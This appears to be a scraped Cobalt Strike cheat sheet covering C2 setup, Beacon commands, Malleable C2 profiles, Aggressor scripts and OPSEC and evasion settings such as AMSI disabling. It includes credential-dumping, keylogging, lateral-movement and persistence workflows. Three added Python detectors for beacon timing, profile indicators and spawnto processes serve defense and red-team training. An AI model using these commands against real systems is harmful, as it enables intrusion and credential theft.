Cobalt Strike Cheat Sheet
"Clase de la hoja"
id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos
id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button
■/div titulada
Overview
Cobalt Strike is a commercial penetration testing and red team operations platform designed to emulate advanced threat actors. It provides a post-exploitation framework that lets operators deploy Beacons (agents) on compromised systems, establish command and control (C2) channels, and carry out a range of offensive security operations.
Warning: Cobalt Strike is a commercial security testing tool that must only be used in environments where you have explicit permission to do so.
Core Components
Team Server
- Central command and control server
- Runs on Linux
- Manages Beacons and listeners
- Provides collaboration for team operations
Client
- Java-based GUI application
- Connects to the Team Server
- Interface through which operators interact with Beacons
- Visualizes target networks
Beacon
- Primary post-exploitation payload
- Establishes communication with the Team Server
- Provides the capabilities used in offensive operations
- Can operate over different communication channels
Setup and Configuration
Team Server Setup
```bash
# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]

# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```
Client Setup
1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter the Team Server details:
   - Host: <team_server_ip>
   - Port: 50050 (default)
   - User: <username>
   - Password: <password>
4. Verify the SSL certificate fingerprint
Listeners
Creating Listeners
1. Cobalt Strike > Listeners
2. Click "Add"
3. Configure the listener settings:
   - Name: <listener_name>
   - Payload: <beacon_type>
   - Host: <callback_domain_or_ip>
   - Port: <port_number>
   - Profile: <malleable_c2_profile>
4. Click "Save"
Listener Types
| Type | Description |
|------|-------------|
| HTTP | Uses HTTP for C2 communication |
| HTTPS | Uses HTTPS for C2 communication |
| DNS | Uses DNS queries for stealthy C2 |
| SMB | Uses named pipes for peer-to-peer C2 |
| TCP | Uses direct TCP connections |
| Foreign | Integrates with other C2 frameworks |
Payload Generation
Beacon Payload Types
```
Attacks > Packages > <payload_type>
```
| Payload Type | Description |
|--------------|-------------|
| Windows Executable | Standard .exe file |
| Windows Service EXE | Service executable |
| DLL | Dynamic Link Library |
| PowerShell | PowerShell one-liner |
| Python | Python script |
| Office Macro | Macro for Office documents |
| Shellcode | Raw shellcode |
Artifact Kit
```
Attacks > Packages > Windows Executable (S)
```
- Generates custom payloads with evasion techniques
- Modifies signatures to avoid detection
- Customizable templates
Beacon Commands
Session Management
| Command | Description |
|---------|-------------|
| help | Display help information |
| sleep [seconds] [jitter%] | Set sleep time and jitter |
| checkin | Force immediate check-in |
| exit | Terminate the Beacon session |
| clear | Clear the Beacon's task queue |
| jobs | List running jobs |
| jobkill [JID] | Kill a running job |
| mode dns | Switch to DNS mode |
| mode dns-txt | Switch to DNS-TXT mode |
| mode dns6 | Switch to DNS6 mode |
| mode http | Switch to HTTP mode |
| mode smb | Switch to SMB mode |
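The `sleep [seconds] [jitter%]` setting is also the defender's handle on a Beacon: each callback waits the sleep time minus a random share of up to the jitter percentage, so `sleep 60 10` produces gaps of roughly 54 to 60 seconds between requests from one host to one server. The following added example (not code from the cheat sheet or from Cobalt Strike) scores (client, destination) pairs in a constructed web-proxy log by how regular their inter-request gaps are, and checks whether a series fits a given sleep/jitter window; the log lines, thresholds and the `slack_s` tolerance are assumptions for the demonstration.

```python
"""Spot sleep/jitter beaconing in web-proxy logs (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: timestamp, client IP, destination host, URI.
# 10.0.0.5 -> cdn.example.net behaves like `sleep 60 10`; 10.0.0.7 is a person browsing.
PROXY_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 cdn.example.net /api/v1/data
2024-01-01T10:00:10Z 10.0.0.7 intranet.example.net /home
2024-01-01T10:00:13Z 10.0.0.7 intranet.example.net /news
2024-01-01T10:00:57Z 10.0.0.5 cdn.example.net /api/v1/data
2024-01-01T10:01:51Z 10.0.0.5 cdn.example.net /api/v1/data
2024-01-01T10:02:13Z 10.0.0.7 intranet.example.net /search
2024-01-01T10:02:28Z 10.0.0.7 intranet.example.net /doc/1
2024-01-01T10:02:51Z 10.0.0.5 cdn.example.net /api/v1/data
2024-01-01T10:03:46Z 10.0.0.5 cdn.example.net /api/v1/data
2024-01-01T10:04:44Z 10.0.0.5 cdn.example.net /api/v1/data
2024-01-01T10:12:28Z 10.0.0.7 intranet.example.net /doc/2
2024-01-01T10:12:30Z 10.0.0.7 intranet.example.net /doc/3
"""


def expected_gap_bounds(sleep_s, jitter_pct):
    """Shortest and longest gap a Beacon with this sleep/jitter can produce."""
    return sleep_s * (1 - jitter_pct / 100), float(sleep_s)


def parse_log(text):
    """Group request timestamps by (client, destination host)."""
    series = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, _uri = line.split()
        series[(client, host)].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    return series


def gap_stats(timestamps):
    """Return (mean, coefficient of variation, min, max) of the inter-request gaps."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:  # too few samples to say anything
        return None
    mu = mean(gaps)
    return mu, (pstdev(gaps) / mu if mu else 0.0), min(gaps), max(gaps)


def is_beaconing(timestamps, max_cv=0.15):
    """Regular gaps (low coefficient of variation) suggest sleep + jitter."""
    stats = gap_stats(timestamps)
    return stats is not None and stats[0] > 0 and stats[1] <= max_cv


def fits_config(timestamps, sleep_s, jitter_pct, slack_s=2.0):
    """True when every gap lies inside the window this sleep/jitter allows (plus slack)."""
    stats = gap_stats(timestamps)
    if stats is None:
        return False
    lo, hi = expected_gap_bounds(sleep_s, jitter_pct)
    return lo - slack_s <= stats[2] and stats[3] <= hi + slack_s


def find_beacons(text):
    """All (client, host) pairs in the log whose timing looks like a Beacon."""
    return sorted(k for k, ts in parse_log(text).items() if is_beaconing(ts))


if __name__ == "__main__":
    series = parse_log(PROXY_LOG)
    for pair in find_beacons(PROXY_LOG):
        print("beaconing:", pair, "gap stats:", gap_stats(series[pair]))
```

The coefficient-of-variation test is deliberately config-agnostic: it flags any tight periodic series, and `fits_config` is the second step once you suspect a particular sleep/jitter pair. Long sleeps (hours) need correspondingly long log windows before `gap_stats` has enough samples.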
| Command | Description |
|---------|-------------|
| hostname | Get the hostname |
| ipconfig | Display network configuration |
| netstat | Display network connections |
| ps | List running processes |
| tasklist | Alternative to ps |
| getuid | Get current user ID |
| whoami | Get detailed user information |
| pwd | Print working directory |
| drives | List available drives |
| dir [directory] | List files in directory |
| ls [directory] | Alternative to dir |
| net [command] | Execute net command |
| reg query [path] | Query registry |
| sysinfo | Get system information |
File Operations
| Command | Description |
|---------|-------------|
| cd [directory] | Change directory |
| cp [source] [destination] | Copy a file |
| mkdir [directory] | Create a directory |
| mv [source] [destination] | Move or rename a file |
| rm [file] | Delete a file |
| rmdir [directory] | Delete a directory |
| cat [file] | Display file contents |
| download [file] | Download a file from the target |
| upload [file] | Upload a file to the target |
| timestomp [file] [template] | Modify file timestamps |
| ls-acl [file] | List file permissions |
Process Operations
| Command | Description |
|---------|-------------|
| execute [program] | Execute without capturing output |
| shell [command] | Execute and capture output |
| run [program] | Execute a program |
| runas [user] [password] [program] | Execute as another user |
| pth [user] [domain] [hash] | Pass-the-hash to create a token |
| steal_token [pid] | Steal token from process |
| make_token [domain] [user] [password] | Create a token |
| rev2self | Revert to original token |
| getprivs | Enable system privileges |
| getsystem | Attempt to get SYSTEM privileges |
| execute-assembly [file.exe] | Execute .NET assembly in memory |
| powerpick [command] | Execute PowerShell without powershell.exe |
| powershell [command] | Execute PowerShell command |
| psinject [pid] [command] | Execute PowerShell in a specific process |
| shinject [pid] [arch] [file.bin] | Inject shellcode into a process |
| dllinject [pid] [file.dll] | Inject DLL into a process |
| dllload [file.dll] | Load DLL in the Beacon process |
Lateral Movement
| Command | Description |
|---------|-------------|
| psexec [target] [listener] | Use PsExec to deploy a Beacon |
| psexec_psh [target] [listener] | Use PsExec with PowerShell |
| winrm [target] [listener] | Use WinRM to deploy a Beacon |
| wmi [target] [listener] | Use WMI to deploy a Beacon |
| ssh [target:port] [user] [pass] [listener] | Use SSH to deploy a Beacon |
| ssh-key [target:port] [user] [key] [listener] | Use SSH with key authentication |
| dcsync [domain] [user] | Use DCSync to extract password hashes |
| jump [method] [target] [listener] | Jump to target using the specified method |
| remote-exec [method] [target] [command] | Execute a command on a remote system |
Pivoting
| Command | Description |
|---------|-------------|
| rportfwd [bind port] [forward host] [forward port] | Set up a reverse port forward |
| rportfwd stop [bind port] | Stop a reverse port forward |
| socks [port] | Start a SOCKS proxy server |
| socks stop | Stop the SOCKS proxy server |
| spunnel [arch] [host] [port] [file] | Spawn an agent and tunnel its traffic through the Beacon to the given controller |
| spunnel stop | Stop the spawned tunnel |
| covertvpn [interface] [IP/Mask] | Deploy a Covert VPN interface |
| covertvpn stop | Stop Covert VPN |
| pivot [host] [port] | List pivot listeners |
| pivotlistener [host] [port] | Create a pivot listener |
Post-Exploitation
| Command | Description |
|---------|-------------|
| mimikatz [command] | Execute a Mimikatz command |
| hashdump | Dump password hashes |
| logonpasswords | Dump credentials from memory |
| keylogger [pid] | Start a keylogger |
| screenshot [pid] | Take a screenshot |
| screenwatch [pid] | Watch the target's screen |
| printscreen | Take a screenshot using PrintScreen |
| reg query [path] | Query registry |
| powerview [command] | Execute a PowerView command |
| portscan [targets] [ports] [discovery method] | Scan for open ports |
| browserpivot [pid] [port] | Hijack authenticated web sessions |
| chromedump | Dump Chrome cookies and login data |
| persist [method] [listener] | Set up persistence |
| elevate [exploit] [listener] | Attempt privilege escalation |
Malleable C2 Profiles
Basic Structure
```
# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

# HTTP staging
http-stager {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Accept" "text/javascript, application/javascript, */*";
    }
    server {
        header "Content-Type" "application/javascript";
    }
}

# HTTP client
http-get {
    set uri "/api/v1/data";
    client {
        header "Accept" "application/json";
        # Session metadata travels in a Cookie header
        metadata {
            base64;
            prepend "session=";
            append ";";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        # Output transforms wrap the base64 task data in a JSON envelope;
        # a transform block must end with a terminator such as print
        output {
            base64;
            prepend "{\"data\":\"";
            append "\"}";
            print;
        }
    }
}
```
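A profile fixes the URIs, User-Agent and headers a Beacon will use, so the same file that shapes the traffic also yields the strings a proxy or IDS rule can match. The following added example (not code from the cheat sheet and not Cobalt Strike's own profile parser) tokenizes the subset of the profile language used above (`set key "value";`, `name { ... }` blocks, `header "Name" "Value";` statements and transforms such as `base64;`), pulls out the network indicators, and matches them against a few constructed proxy observations. The embedded profile is the one from this section; `OBSERVED` and the indicator field names are assumptions for the demonstration.

```python
"""Extract network indicators from a Malleable C2 profile (added example)."""
import re

# The profile from the section above, embedded as the sample input.
PROFILE = r"""
# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
http-stager {
    set uri "/jquery-3.3.1.min.js";
    client { header "Accept" "text/javascript, application/javascript, */*"; }
    server { header "Content-Type" "application/javascript"; }
}
http-get {
    set uri "/api/v1/data";
    client {
        header "Accept" "application/json";
        metadata { base64; prepend "session="; append ";"; header "Cookie"; }
    }
    server {
        header "Content-Type" "application/json";
        output { base64; prepend "{\"data\":\""; append "\"}"; print; }
    }
}
"""

# Quoted string (with backslash escapes), braces, terminator, comment, bare word.
_TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|(\{)|(\})|(;)|#[^\n]*|([^\s"{};#]+)')


def tokenize(text):
    """Yield (kind, value) pairs; comments are dropped, strings keep their raw text."""
    for m in _TOKEN.finditer(text):
        if m.group(1) is not None:
            yield "str", m.group(1)
        elif m.group(2):
            yield "open", "{"
        elif m.group(3):
            yield "close", "}"
        elif m.group(4):
            yield "end", ";"
        elif m.group(5):
            yield "word", m.group(5)
        # otherwise the match was a comment and is skipped


def parse_profile(text):
    """Flatten the profile to (block path, statement tokens) pairs."""
    statements, stack, current = [], [], []
    for kind, value in tokenize(text):
        if kind == "open":            # tokens seen so far name the block, e.g. http-get
            stack.append(" ".join(current))
            current = []
        elif kind == "close":
            stack.pop()
            current = []
        elif kind == "end":
            if current:
                statements.append((tuple(stack), tuple(current)))
            current = []
        else:
            current.append(value)
    return statements


def extract_indicators(text):
    """Collect the values a defender can match on: UA, timing, URIs and headers."""
    ind = {"useragent": None, "sleeptime_ms": None, "jitter_pct": None,
           "uris": [], "request_headers": [], "response_headers": []}
    for path, toks in parse_profile(text):
        block = path[0] if path else ""
        if toks[0] == "set" and len(toks) == 3:
            key, value = toks[1], toks[2]
            if not path and key == "useragent":
                ind["useragent"] = value
            elif not path and key == "sleeptime":
                ind["sleeptime_ms"] = int(value)
            elif not path and key == "jitter":
                ind["jitter_pct"] = int(value)
            elif key == "uri":        # a uri setting may list several space-separated URIs
                ind["uris"].extend((block, u) for u in value.split())
        elif toks[0] == "header" and len(toks) == 3:
            side = "request_headers" if "client" in path else "response_headers"
            ind[side].append((block, toks[1], toks[2]))
    return ind


def matching_requests(ind, requests):
    """Indices of (uri, user_agent) pairs that hit both a profile URI and the profile UA."""
    uris = {u for _, u in ind["uris"]}
    return [i for i, (uri, ua) in enumerate(requests)
            if uri in uris and ua == ind["useragent"]]


# Constructed proxy observations: (requested URI, User-Agent header).
OBSERVED = [
    ("/api/v1/data", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"),
    ("/index.html", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"),
    ("/api/v1/data", "curl/8.0"),
]

if __name__ == "__main__":
    print(extract_indicators(PROFILE))
    print("matches:", matching_requests(OBSERVED and extract_indicators(PROFILE), OBSERVED))
```

Matching on URI plus User-Agent is an exact-indicator check and only catches traffic shaped by this particular profile; the `sleeptime_ms` and `jitter_pct` values it returns are what you would feed into a timing analysis to catch the same Beacon after the operator changes the URIs.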
Testing Profiles
```bash
# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile

# Start the Team Server with the profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```
Aggressor Scripts
Basic Script Structure
```
# Event handlers
on beacon_initial {
    println("New beacon: " . $1);
}

# Aliases (custom commands)
alias hello {
    blog($1, "Hello, World!");
}

# Menus
popup beacon_bottom {
    item "Custom Command" {
        # In a popup, $1 holds the list of selected Beacon IDs
        foreach $bid ($1) {
            blog($bid, "Executing custom command...");
            bshell($bid, "whoami");
        }
    }
}

# Functions
sub get_system_info {
    bshell($1, "systeminfo");
}
```
Common Script Functions
| Function | Description |
|----------|-------------|
| blog($1, "message") | Write to the Beacon console |
| bshell($1, "command") | Execute a shell command |
| bpowershell($1, "command") | Execute a PowerShell command |
| bpowerpick($1, "command") | Execute PowerShell without powershell.exe |
| bexecute_assembly($1, "/path/to/file.exe") | Execute a .NET assembly |
| bdllspawn($1, "/path/to/file.dll") | Inject a Reflective DLL |
| bpsexec($1, "target", "listener") | Execute PsExec lateral movement |
| bwmi($1, "target", "listener") | Execute WMI lateral movement |
| bwinrm($1, "target", "listener") | Execute WinRM lateral movement |
OPSEC Considerations
Process Injection
```
# Set the parent process for new processes
ppid [pid]

# Set the process to spawn for post-ex jobs
spawnto x64 %windir%\sysnative\rundll32.exe
spawnto x86 %windir%\syswow64\rundll32.exe

# Mask command-line arguments
argue [command] [fake arguments]

# Block non-Microsoft DLLs
blockdlls start
blockdlls stop
```
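Each of these settings leaves a trace in process-creation telemetry: the `spawnto` binary is started as a sacrificial process with an empty argument list, and `ppid` places it under a parent that would not normally launch it. The following added example (not code from the cheat sheet or from Cobalt Strike) runs those two checks over constructed Sysmon-style process-creation events. The only spawnto binary it knows is the `rundll32.exe` configured above; the parent allow-list, the event records and the field names are assumptions for the demonstration.

```python
"""Flag sacrificial post-ex processes in process-creation telemetry (added example)."""
import ntpath

# Binaries configured as spawnto targets; rundll32.exe is the one from the page.
SPAWNTO_BINARIES = {"rundll32.exe"}

# Constructed allow-list of parents that legitimately launch rundll32.exe.
EXPECTED_PARENTS = {"explorer.exe", "svchost.exe", "services.exe", "msiexec.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style fields).
EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'},
    {"pid": 5210, "parent_image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe"},
    {"pid": 5300, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'"C:\Windows\SysWOW64\rundll32.exe"'},
    {"pid": 6000, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def split_cmdline(cmdline):
    """Return (executable, argument string) from a Windows command line."""
    cmd = cmdline.strip()
    if cmd.startswith('"'):                 # quoted executable path
        end = cmd.find('"', 1)
        if end == -1:
            return cmd[1:], ""
        return cmd[1:end], cmd[end + 1:].strip()
    exe, _, rest = cmd.partition(" ")
    return exe, rest.strip()


def has_no_arguments(cmdline):
    """True when the command line consists of the executable path alone."""
    return split_cmdline(cmdline)[1] == ""


def classify(event):
    """Reasons this event is suspicious; an empty list means it passed both checks."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    reasons = []
    if image in SPAWNTO_BINARIES:
        if has_no_arguments(event["cmdline"]):
            reasons.append("spawnto binary started with no arguments")
        if parent not in EXPECTED_PARENTS:
            reasons.append(f"unexpected parent {parent}")
    return reasons


def find_suspicious(events):
    """(pid, reasons) for every event that trips at least one check."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in find_suspicious(EVENTS):
        print(pid, "->", "; ".join(reasons))
```

The no-arguments check is the stronger of the two: a legitimate rundll32.exe launch almost always names a DLL and entry point. `argue` does not help the operator here, because it only rewrites the arguments shown for the post-ex process itself, while the event above is the creation of the sacrificial process.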
Evasion Techniques
```
# Malleable C2 stage block: obfuscate and mask the Beacon in memory
stage {
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
    set sleep_mask "true";
}

# Malleable C2 post-ex block: disable AMSI in post-ex jobs and use smarter process injection
post-ex {
    set amsi_disable "true";
    set smartinject "true";
}
```
Common Workflows
Initial Access
1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver the payload to the target
4. Wait for the Beacon check-in
Privilege Escalation
1. Check current privileges: getuid
2. Attempt to get SYSTEM: getsystem
3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
4. Verify the new privileges: getuid
Credential Harvesting
1. Dump hashes: hashdump
2. Dump credentials from memory: logonpasswords
3. Use Mimikatz for advanced options: mimikatz [command]
4. Extract domain hashes (if DC): dcsync [domain] [user]
Lateral Movement
1. Identify targets: net view
2. Choose a lateral movement technique:
   - psexec [target] [listener]
   - winrm [target] [listener]
   - wmi [target] [listener]
3. Verify the new Beacon check-in
Persistence
1. Choose a persistence method:
   - persist [method] [listener]
   - schtasks [options]
   - service [options]
   - registry [options]
2. Verify that persistence works
3. Document persistence mechanisms for cleanup
Resources